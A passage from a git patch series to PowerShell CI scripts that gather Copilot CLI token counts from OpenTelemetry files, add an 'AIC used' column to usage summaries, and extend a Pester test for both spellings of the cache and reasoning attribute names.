+ } elseif ($tokenType -eq 'output') { + $metricSums.output += [double]$sumValue + $metricSeen.output = $true + } elseif ($tokenType -match '(?i)cache') { + $metricSums.cached += [double]$sumValue + $metricSeen.cached = $true + } + } + } + } + + $inputTokens = if ($spanSeen.input) { [long][Math]::Round($spanSums.input) } elseif ($metricSeen.input) { [long][Math]::Round($metricSums.input) } else { $null } + $outputTokens = if ($spanSeen.output) { [long][Math]::Round($spanSums.output) } elseif ($metricSeen.output) { [long][Math]::Round($metricSums.output) } else { $null } + $cachedInputTokens = if ($spanSeen.cached) { [long][Math]::Round($spanSums.cached) } elseif ($metricSeen.cached) { [long][Math]::Round($metricSums.cached) } else { $null } + $reasoningOutputTokens = if ($spanSeen.reasoning) { [long][Math]::Round($spanSums.reasoning) } else { $null } + $copilotCost = if ($spanSeen.cost) { [Math]::Round($spanSums.cost, 3) } else { $null } + + $totalTokens = if ($null -ne $inputTokens -or $null -ne $outputTokens) { + [long](($inputTokens ?? 0) + ($outputTokens ?? 0)) + } else { + $null + } + + $metrics.inputTokens = $inputTokens + $metrics.outputTokens = $outputTokens + $metrics.cachedInputTokens = $cachedInputTokens + $metrics.reasoningOutputTokens = $reasoningOutputTokens + $metrics.totalTokens = $totalTokens + $metrics.copilotCost = $copilotCost + $metrics.available = ($null -ne $inputTokens -or $null -ne $outputTokens -or $null -ne $cachedInputTokens -or $null -ne $copilotCost) + + return $metrics +} + function New-CopilotTokenUsageRecord { param( [int]$PRNumber, @@ -760,12 +912,46 @@ function New-CopilotTokenUsageRecord { [int]$ToolCount, [int]$FailedToolCount, [object]$Usage, + [object]$OtelMetrics, + [object]$AicUsed, + [object]$ContextWindow, + [string]$ContextWindowRaw, [bool]$ResultEventSeen, [int]$ExitCode ) $apiDurationValue = Get-ObjectMemberValue -InputObject $Usage -Names @('totalApiDurationMs', 'total_api_duration_ms') $apiDurationMs = if (Test-IsNumericValue $apiDurationValue) { [long]$apiDurationValue } else { $null } + $usageTokenMetrics = Get-CopilotTokenMetrics -Usage $Usage + + $inputTokens = $usageTokenMetrics.inputTokens + $outputTokens = $usageTokenMetrics.outputTokens + $cachedInputTokens = $usageTokenMetrics.cachedInputTokens + $totalTokens = $usageTokenMetrics.totalTokens + $reasoningOutputTokens = $null + $copilotCost = $null + $otelFile = $null + + if ($OtelMetrics) { + if ($null -eq $inputTokens -and $null -ne $OtelMetrics.inputTokens) { $inputTokens = $OtelMetrics.inputTokens } + if ($null -eq $outputTokens -and $null -ne $OtelMetrics.outputTokens) { $outputTokens = $OtelMetrics.outputTokens } + if ($null -eq $cachedInputTokens -and $null -ne $OtelMetrics.cachedInputTokens) { $cachedInputTokens = $OtelMetrics.cachedInputTokens } + if ($null -eq $totalTokens -and $null -ne $OtelMetrics.totalTokens) { $totalTokens = $OtelMetrics.totalTokens } + $reasoningOutputTokens = $OtelMetrics.reasoningOutputTokens + $copilotCost = $OtelMetrics.copilotCost + $otelFile = $OtelMetrics.file + } + + $billingUnits = $AicUsed + if ($null -eq $billingUnits -and $null -ne $copilotCost) { + $billingUnits = $copilotCost + } + if ($null -eq $billingUnits) { + $premiumRequests = Get-ObjectMemberValue -InputObject $Usage -Names @('premiumRequests') + if (Test-IsNumericValue $premiumRequests) { + $billingUnits = [double]$premiumRequests + } + } return [ordered]@{ schemaVersion = 1 @@ -793,7 +979,20 @@ function New-CopilotTokenUsageRecord { turnCount = $TurnCount toolCount = $ToolCount failedToolCount = $FailedToolCount - normalizedTokens = Get-CopilotTokenMetrics -Usage $Usage + cliUsage = [ordered]@{ + aicUsed = $billingUnits + contextWindow = $ContextWindow + contextWindowRaw = $ContextWindowRaw + } + normalizedTokens = [ordered]@{ + inputTokens = $inputTokens + outputTokens = $outputTokens + cachedInputTokens = $cachedInputTokens + reasoningOutputTokens = $reasoningOutputTokens + totalTokens = $totalTokens + rawTokenFields = @($usageTokenMetrics.rawTokenFields) + otelFile = $otelFile + } usage = $Usage costEstimateAvailable = $false costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' @@ -852,6 +1051,9 @@ function Invoke-CopilotStep { $failedTools = @() $resultEventSeen = $false $resultUsage = $null + $cliAicUsed = $null + $cliContextWindow = $null + $cliContextWindowRaw = $null # Tool icon mapping for common tools $toolIcons = @{ @@ -873,136 +1075,180 @@ function Invoke-CopilotStep { if ([string]::IsNullOrWhiteSpace($modelName)) { $modelName = $copilotModel } - & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { - $line = $_.ToString() - try { - $event = $line | ConvertFrom-Json -ErrorAction Stop - switch ($event.type) { - 'session.tools_updated' { - if ($event.data.model) { - $modelName = $event.data.model - Write-Host " ⚙️ Model: " -ForegroundColor DarkGray -NoNewline - Write-Host $modelName -ForegroundColor DarkCyan + $safeOtelStepName = ($StepName -replace '[^A-Za-z0-9._-]+', '-').Trim('-') + if ([string]::IsNullOrWhiteSpace($safeOtelStepName)) { + $safeOtelStepName = 'copilot-step' + } + $otelPath = $null + if (-not [string]::IsNullOrWhiteSpace($TokenUsageOutputDir)) { + New-Item -ItemType Directory -Path $TokenUsageOutputDir -Force | Out-Null + $otelPath = Join-Path $TokenUsageOutputDir "copilot-otel-$([DateTimeOffset]::UtcNow.ToString('yyyyMMddTHHmmssfffZ'))-$safeOtelStepName-$([guid]::NewGuid().ToString('N')).jsonl" + } + + $savedOtel = @{ + COPILOT_OTEL_FILE_EXPORTER_PATH = $env:COPILOT_OTEL_FILE_EXPORTER_PATH + COPILOT_OTEL_EXPORTER_TYPE = $env:COPILOT_OTEL_EXPORTER_TYPE + OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT = $env:OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT + } + try { + if ($otelPath) { + $env:COPILOT_OTEL_FILE_EXPORTER_PATH = $otelPath + $env:COPILOT_OTEL_EXPORTER_TYPE = 'file' + $env:OTEL_INSTRUMENTATION_GENAI_CAPTURE_MESSAGE_CONTENT = 'false' + } + + & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { + $line = $_.ToString() + try { + $event = $line | ConvertFrom-Json -ErrorAction Stop + switch ($event.type) { + 'session.tools_updated' { + if ($event.data.model) { + $modelName = $event.data.model + Write-Host " ⚙️ Model: " -ForegroundColor DarkGray -NoNewline + Write-Host $modelName -ForegroundColor DarkCyan + } } - } - 'assistant.turn_start' { - $turnCount++ - $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") - Write-Host "" - Write-Host " ┌─ Turn $turnCount " -ForegroundColor DarkGray -NoNewline - Write-Host "[$elapsed]" -ForegroundColor DarkYellow -NoNewline - if ($currentIntent) { - Write-Host " · $currentIntent" -ForegroundColor DarkCyan - } else { + 'assistant.turn_start' { + $turnCount++ + $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") Write-Host "" + Write-Host " ┌─ Turn $turnCount " -ForegroundColor DarkGray -NoNewline + Write-Host "[$elapsed]" -ForegroundColor DarkYellow -NoNewline + if ($currentIntent) { + Write-Host " · $currentIntent" -ForegroundColor DarkCyan + } else { + Write-Host "" + } } - } - 'assistant.turn_end' { - Write-Host " └─" -ForegroundColor DarkGray - } - 'tool.execution_start' { - $toolName = $event.data.toolName - $args_ = $event.data.arguments - - # Capture intent changes silently - if ($toolName -eq 'report_intent') { - $currentIntent = $args_.intent ?? $currentIntent - Write-Host " │ 🎯 " -ForegroundColor DarkGray -NoNewline - Write-Host $currentIntent -ForegroundColor Yellow - break + 'assistant.turn_end' { + Write-Host " └─" -ForegroundColor DarkGray } + 'tool.execution_start' { + $toolName = $event.data.toolName + $args_ = $event.data.arguments + + # Capture intent changes silently + if ($toolName -eq 'report_intent') { + $currentIntent = $args_.intent ?? $currentIntent + Write-Host " │ 🎯 " -ForegroundColor DarkGray -NoNewline + Write-Host $currentIntent -ForegroundColor Yellow + break + } - $toolCount++ - $icon = $toolIcons[$toolName] - if (-not $icon) { - # Prefix match for github-mcp-server-* and other compound names - $icon = if ($toolName -like 'github-*') { '🔀' } else { '🔧' } - } + $toolCount++ + $icon = $toolIcons[$toolName] + if (-not $icon) { + # Prefix match for github-mcp-server-* and other compound names + $icon = if ($toolName -like 'github-*') { '🔀' } else { '🔧' } + } - # Build a short display name for long tool names - $displayName = $toolName -replace '^github-mcp-server-', 'gh/' + # Build a short display name for long tool names + $displayName = $toolName -replace '^github-mcp-server-', 'gh/' - # Pick the most useful detail from arguments - $detail = $args_.description ?? $args_.intent ?? '' - if (-not $detail) { - # Fallback: pick first informative arg - $detail = $args_.command ?? $args_.pattern ?? $args_.query ?? $args_.path ?? $args_.prompt ?? '' - } - if ($detail) { - $detail = $detail.Substring(0, [Math]::Min($detail.Length, 90)) - # Truncate at last word boundary if we cut mid-word - if ($detail.Length -eq 90) { - $lastSpace = $detail.LastIndexOf(' ') - if ($lastSpace -gt 60) { $detail = $detail.Substring(0, $lastSpace) + "…" } - else { $detail += "…" } + # Pick the most useful detail from arguments + $detail = $args_.description ?? $args_.intent ?? '' + if (-not $detail) { + # Fallback: pick first informative arg + $detail = $args_.command ?? $args_.pattern ?? $args_.query ?? $args_.path ?? $args_.prompt ?? '' + } + if ($detail) { + $detail = $detail.Substring(0, [Math]::Min($detail.Length, 90)) + # Truncate at last word boundary if we cut mid-word + if ($detail.Length -eq 90) { + $lastSpace = $detail.LastIndexOf(' ') + if ($lastSpace -gt 60) { $detail = $detail.Substring(0, $lastSpace) + "…" } + else { $detail += "…" } + } } - } - Write-Host " │ $icon " -ForegroundColor DarkGray -NoNewline - Write-Host $displayName -ForegroundColor Cyan -NoNewline - if ($detail) { - Write-Host " $detail" -ForegroundColor DarkGray - } else { - Write-Host "" + Write-Host " │ $icon " -ForegroundColor DarkGray -NoNewline + Write-Host $displayName -ForegroundColor Cyan -NoNewline + if ($detail) { + Write-Host " $detail" -ForegroundColor DarkGray + } else { + Write-Host "" + } } - } - 'tool.execution_complete' { - if (-not $event.data.success) { - $failedTool = $event.data.toolCallId - $failedTools += $failedTool - Write-Host " │ ❌ Tool failed" -ForegroundColor Red + 'tool.execution_complete' { + if (-not $event.data.success) { + $failedTool = $event.data.toolCallId + $failedTools += $failedTool + Write-Host " │ ❌ Tool failed" -ForegroundColor Red + } } - } - 'assistant.message' { - $content = $event.data.content - # Show agent text responses (skip empty tool-request-only messages) - if ($content -and $content.Trim()) { - $preview = $content.Trim() - if ($preview.Length -gt 400) { - $preview = $preview.Substring(0, 400) + "…" + 'assistant.message' { + $content = $event.data.content + # Show agent text responses (skip empty tool-request-only messages) + if ($content -and $content.Trim()) { + $preview = $content.Trim() + if ($preview.Length -gt 400) { + $preview = $preview.Substring(0, 400) + "…" + } + Write-Host " │ 💬 " -ForegroundColor DarkGray -NoNewline + Write-Host $preview -ForegroundColor White } - Write-Host " │ 💬 " -ForegroundColor DarkGray -NoNewline - Write-Host $preview -ForegroundColor White } - } - 'result' { - # Final stats — note: 'result' is a top-level event with no 'data' wrapper. - $resultEventSeen = $true - $usage = $event.usage - $resultUsage = $usage - if ($usage) { - $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") - $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" } - $changes = $usage.codeChanges - $filesChanged = if ($changes -and $changes.filesModified) { @($changes.filesModified).Count } else { 0 } - $linesAdded = if ($changes) { $changes.linesAdded } else { 0 } - $linesRemoved = if ($changes) { $changes.linesRemoved } else { 0 } - - Write-Host "" - Write-Host " ╭──────────────────────────────────────────╮" -ForegroundColor DarkGray - Write-Host " │ ⏱ $elapsed elapsed ($($apiMs)s API)" -ForegroundColor DarkGray -NoNewline - Write-Host " │ 🔧 $toolCount tools" -ForegroundColor DarkGray -NoNewline - Write-Host " │ 🔄 $turnCount turns" -ForegroundColor DarkGray - if ($filesChanged -gt 0 -or $linesAdded -gt 0 -or $linesRemoved -gt 0) { - Write-Host " │ 📝 $filesChanged files " -ForegroundColor DarkGray -NoNewline - Write-Host "+$linesAdded" -ForegroundColor Green -NoNewline - Write-Host "/" -ForegroundColor DarkGray -NoNewline - Write-Host "-$linesRemoved" -ForegroundColor Red + 'result' { + # Final stats — note: 'result' is a top-level event with no 'data' wrapper. + $resultEventSeen = $true + $usage = $event.usage + $resultUsage = $usage + if ($usage) { + $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") + $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" } + $changes = $usage.codeChanges + $filesChanged = if ($changes -and $changes.filesModified) { @($changes.filesModified).Count } else { 0 } + $linesAdded = if ($changes) { $changes.linesAdded } else { 0 } + $linesRemoved = if ($changes) { $changes.linesRemoved } else { 0 } + + Write-Host "" + Write-Host " ╭──────────────────────────────────────────╮" -ForegroundColor DarkGray + Write-Host " │ ⏱ $elapsed elapsed ($($apiMs)s API)" -ForegroundColor DarkGray -NoNewline + Write-Host " │ 🔧 $toolCount tools" -ForegroundColor DarkGray -NoNewline + Write-Host " │ 🔄 $turnCount turns" -ForegroundColor DarkGray + if ($filesChanged -gt 0 -or $linesAdded -gt 0 -or $linesRemoved -gt 0) { + Write-Host " │ 📝 $filesChanged files " -ForegroundColor DarkGray -NoNewline + Write-Host "+$linesAdded" -ForegroundColor Green -NoNewline + Write-Host "/" -ForegroundColor DarkGray -NoNewline + Write-Host "-$linesRemoved" -ForegroundColor Red + } + Write-Host " ╰──────────────────────────────────────────╯" -ForegroundColor DarkGray } - Write-Host " ╰──────────────────────────────────────────╯" -ForegroundColor DarkGray } } + } catch { + $cliLineData = Get-CopilotCliUsageLineData -Line $line + if ($cliLineData.Contains('aicUsed')) { + $cliAicUsed = $cliLineData.aicUsed + } + if ($cliLineData.Contains('contextWindow')) { + $cliContextWindow = $cliLineData.contextWindow + $cliContextWindowRaw = $cliLineData.contextWindowRaw + } + if ($cliLineData.Contains('model') -and -not [string]::IsNullOrWhiteSpace([string]$cliLineData.model)) { + $modelName = [string]$cliLineData.model + } + + # Non-JSON line (e.g. stats) — pass through as-is + if ($line.Trim()) { + Write-Host " $line" -ForegroundColor DarkGray + } } - } catch { - # Non-JSON line (e.g. stats) — pass through as-is - if ($line.Trim()) { - Write-Host " $line" -ForegroundColor DarkGray + } + } finally { + foreach ($key in $savedOtel.Keys) { + if ($null -eq $savedOtel[$key]) { + Remove-Item -Path ("env:" + $key) -ErrorAction SilentlyContinue + } else { + Set-Item -Path ("env:" + $key) -Value $savedOtel[$key] } } } $exitCode = $LASTEXITCODE $stopwatch.Stop() $endedAtUtc = [DateTimeOffset]::UtcNow + $otelMetrics = Get-CopilotOtelTokenMetrics -Path $otelPath $usageRecord = New-CopilotTokenUsageRecord ` -PRNumber $PRNumber ` @@ -1017,6 +1263,10 @@ function Invoke-CopilotStep { -ToolCount $toolCount ` -FailedToolCount (@($failedTools).Count) ` -Usage $resultUsage ` + -OtelMetrics $otelMetrics ` + -AicUsed $cliAicUsed ` + -ContextWindow $cliContextWindow ` + -ContextWindowRaw $cliContextWindowRaw ` -ResultEventSeen $resultEventSeen ` -ExitCode $exitCode Write-CopilotTokenUsageRecord -OutputDir $TokenUsageOutputDir -Record $usageRecord diff --git a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 index 6b3d8355a3e1..7de28c850802 100644 --- a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 +++ b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 @@ -112,6 +112,23 @@ function Get-NullableSum { return [long][Math]::Round($sum) } +function Get-NullableDecimalSum { + param([object[]]$Values) + + $hasValue = $false + $sum = 0.0 + foreach ($value in @($Values)) { + $numeric = Get-NumericOrNull -Value $value + if ($null -ne $numeric) { + $hasValue = $true + $sum += $numeric + } + } + + if (-not $hasValue) { return $null } + return [Math]::Round($sum, 3) +} + function Get-RecordStageName { param([object]$Record) @@ -132,6 +149,12 @@ function Get-RecordTokenValue { return Get-NestedValue -InputObject $Record -Path @('normalizedTokens', $Name) } +function Get-RecordAicUsed { + param([object]$Record) + + return Get-NestedValue -InputObject $Record -Path @('cliUsage', 'aicUsed') +} + function Read-CopilotTokenUsageRecords { param([string]$Root) @@ -187,6 +210,7 @@ function New-StageSummaryRows { outputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) } else { 0 } cachedInputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) } else { 0 } totalTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) } else { 0 } + aicUsed = if ($hasRecords) { Get-NullableDecimalSum -Values @($stageRecords | ForEach-Object { Get-RecordAicUsed -Record $_ }) } else { 0 } durationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.durationMs }) } else { 0 } apiDurationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.apiDurationMs }) } else { 0 } turnCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.turnCount }) } else { 0 } @@ -226,6 +250,7 @@ function New-StepSummaryRows { inputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) outputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) totalTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + aicUsed = Get-NullableDecimalSum -Values @($items | ForEach-Object { Get-RecordAicUsed -Record $_ }) durationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.durationMs }) apiDurationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.apiDurationMs }) turnCount = Get-NullableSum -Values @($items | ForEach-Object { $_.turnCount }) @@ -260,6 +285,7 @@ function New-CopilotTokenUsageSummary { outputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) cachedInputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) totalTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + aicUsed = Get-NullableDecimalSum -Values @($Records | ForEach-Object { Get-RecordAicUsed -Record $_ }) durationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.durationMs }) apiDurationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.apiDurationMs }) turnCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.turnCount }) @@ -299,6 +325,7 @@ function New-CopilotTokenUsageMarkdown { [void]$lines.Add("| Output tokens | $(Format-UsageValue $Summary.totals.outputTokens) |") [void]$lines.Add("| Cached input tokens | $(Format-UsageValue $Summary.totals.cachedInputTokens) |") [void]$lines.Add("| Total tokens | $(Format-UsageValue $Summary.totals.totalTokens) |") + [void]$lines.Add("| AIC used | $(Format-UsageValue $Summary.totals.aicUsed) |") [void]$lines.Add("| Elapsed ms | $(Format-UsageValue $Summary.totals.durationMs) |") [void]$lines.Add("| API duration ms | $(Format-UsageValue $Summary.totals.apiDurationMs) |") [void]$lines.Add("| Turns | $(Format-UsageValue $Summary.totals.turnCount) |") @@ -306,10 +333,10 @@ function New-CopilotTokenUsageMarkdown { [void]$lines.Add('') [void]$lines.Add('## By stage') [void]$lines.Add('') - [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | Elapsed ms | API ms | Note |') - [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---|') + [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | AIC used | Elapsed ms | API ms | Note |') + [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---:|---|') foreach ($stage in @($Summary.stages)) { - [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) | $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") + [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) | $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.aicUsed) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") } [void]$lines.Add('') [void]$lines.Add('## By Copilot step') @@ -317,10 +344,10 @@ function New-CopilotTokenUsageMarkdown { if (@($Summary.steps).Count -eq 0) { [void]$lines.Add('No Copilot invocations were recorded.') } else { - [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | Elapsed ms | API ms |') - [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|') + [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | AIC used | Elapsed ms | API ms |') + [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|---:|') foreach ($step in @($Summary.steps)) { - [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue $step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.durationMs) | $(Format-UsageValue $step.apiDurationMs) |") + [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue $step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.aicUsed) | $(Format-UsageValue $step.durationMs) | $(Format-UsageValue $step.apiDurationMs) |") } } @@ -347,7 +374,7 @@ $csvPath = Join-Path $OutputDir 'token-usage-by-step.csv' if (@($summary.steps).Count -gt 0) { @($summary.steps) | Export-Csv -Path $csvPath -NoTypeInformation -Encoding UTF8 } else { - 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,durationMs,apiDurationMs,turnCount,toolCount' | + 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,aicUsed,durationMs,apiDurationMs,turnCount,toolCount' | Set-Content -Path $csvPath -Encoding UTF8 } From fb1c6fbc6c5845d3d5fc32a5b7b201e834a76522 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 7 Jun 2026 17:32:14 +0200 Subject: [PATCH 34/34] Handle Copilot OTel token attribute variants Support both dotted and underscore cache/reasoning OTel attribute names so production pipeline runs report cached input and reasoning output tokens consistently. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.Tests.ps1 | 41 ++++++++++++++++++----------- .github/scripts/Review-PR.ps1 | 4 +-- 2 files changed, 28 insertions(+), 17 deletions(-) diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 362e3e6fa788..d4a4f50ebc3c 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -84,28 +84,39 @@ Describe 'Copilot token usage helpers' { $contextLine.contextWindow | Should -Be 1100000 } - It 'reads token counts from Copilot OTel spans' { + It 'reads token counts from Copilot OTel spans with both cache/reasoning naming variants' { $otelPath = Join-Path ([System.IO.Path]::GetTempPath()) "copilot-otel-$([guid]::NewGuid()).jsonl" try { - [ordered]@{ - type = 'span' - attributes = [ordered]@{ - 'gen_ai.usage.input_tokens' = 1000 - 'gen_ai.usage.output_tokens' = 200 - 'gen_ai.usage.cache_read.input_tokens' = 800 - 'gen_ai.usage.reasoning.output_tokens' = 50 - 'github.copilot.cost' = 7.5 + @( + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 1000 + 'gen_ai.usage.output_tokens' = 200 + 'gen_ai.usage.cache_read.input_tokens' = 800 + 'gen_ai.usage.reasoning.output_tokens' = 50 + 'github.copilot.cost' = 7.5 + } + }, + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 500 + 'gen_ai.usage.output_tokens' = 40 + 'gen_ai.usage.cache_read_input_tokens' = 400 + 'gen_ai.usage.reasoning_output_tokens' = 10 + } } - } | ConvertTo-Json -Depth 10 -Compress | Set-Content $otelPath -Encoding UTF8 + ) | ForEach-Object { $_ | ConvertTo-Json -Depth 10 -Compress } | Set-Content $otelPath -Encoding UTF8 $metrics = Get-CopilotOtelTokenMetrics -Path $otelPath $metrics.available | Should -Be $true - $metrics.inputTokens | Should -Be 1000 - $metrics.outputTokens | Should -Be 200 - $metrics.cachedInputTokens | Should -Be 800 - $metrics.reasoningOutputTokens | Should -Be 50 - $metrics.totalTokens | Should -Be 1200 + $metrics.inputTokens | Should -Be 1500 + $metrics.outputTokens | Should -Be 240 + $metrics.cachedInputTokens | Should -Be 1200 + $metrics.reasoningOutputTokens | Should -Be 60 + $metrics.totalTokens | Should -Be 1740 $metrics.copilotCost | Should -Be 7.5 } finally { Remove-Item $otelPath -Force -ErrorAction SilentlyContinue diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 44632634ce58..4dcbbda429b3 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -846,8 +846,8 @@ function Get-CopilotOtelTokenMetrics { $attributes = $entry.attributes $inputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.input_tokens') $outputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.output_tokens') - $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens') - $reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens') + $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens', 'gen_ai.usage.cache_read_input_tokens') + $reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens', 'gen_ai.usage.reasoning_output_tokens') $costValue = Get-ObjectMemberValue -InputObject $attributes -Names @('github.copilot.cost') if (Test-IsNumericValue $inputValue) { $spanSums.input += [double]$inputValue; $spanSeen.input = $true }